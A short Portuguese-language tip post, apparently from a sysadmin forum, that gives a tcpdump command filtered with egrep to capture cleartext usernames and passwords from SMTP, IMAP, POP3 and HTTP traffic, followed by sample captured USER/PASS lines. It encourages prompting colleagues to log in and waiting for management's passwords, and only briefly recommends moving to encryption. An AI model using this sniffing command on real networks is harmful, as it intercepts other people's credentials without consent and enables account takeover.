tcpdump - Capturando senhas de serviços POP3/IMAP/SMTP ou HTTP

Esta é uma dica rápida, utilizando tcpdump para capturar as senhas dos serviços de e-mail (POP3/IMAP/SMTP) e/ou de aplicações em HTTP, e mostrar o usuário e senha em clean-text no shell do seu terminal.

Execute:

# tcpdump -i eth0 port smtp or port imap or port pop3 or port http -l -A | egrep -i 'pass=|pwd=|log=|login=|user=|username=|pw=|passw=|passwd=|password=|pass:|user:|username:|password:|login:|pass |user '

E deixe rodando...

Para "facilitar", peça para alguém fechar e abrir o cliente de e-mail ou acessar a "Intranet" em o HTTP.

O resultado, será algo assim:

E..?u.@........g.......n....[...P.@.w...USER xxxxx.yyyyy

E..4u.@........g.......n....[...P.@..u..PASS golll123

E..>..@..............M.n...7\2..P...<...USER mazzzzeeee.yyyy

E..5..@..............M.n...M\2..P...!...PASS 14333

Espere até aparecer uma senha da diretoria. :)
E demonstre seu conhecimento. :)

Acredito que conseguirá migrar os seus serviços de e-mail, aplicações HTTP e implementar criptografia.

Observações e considerações:

• Não é o foco da dica a instalação do tcpdump (apt-get/yum/pkg_add), nem comandos avançados, mas posso escrever um artigo com mais comandos.
• Nome e senhas fictícios.
• Para ter o correto funcionamento, executar essa rotina no próprio servidor, Gateway ou por onde passe os pacotes para o servidor a ser "monitorado".

Qualquer dúvida/crítica/sugestão/elogio, fico à disposição.

Abraço a todos.

:wq!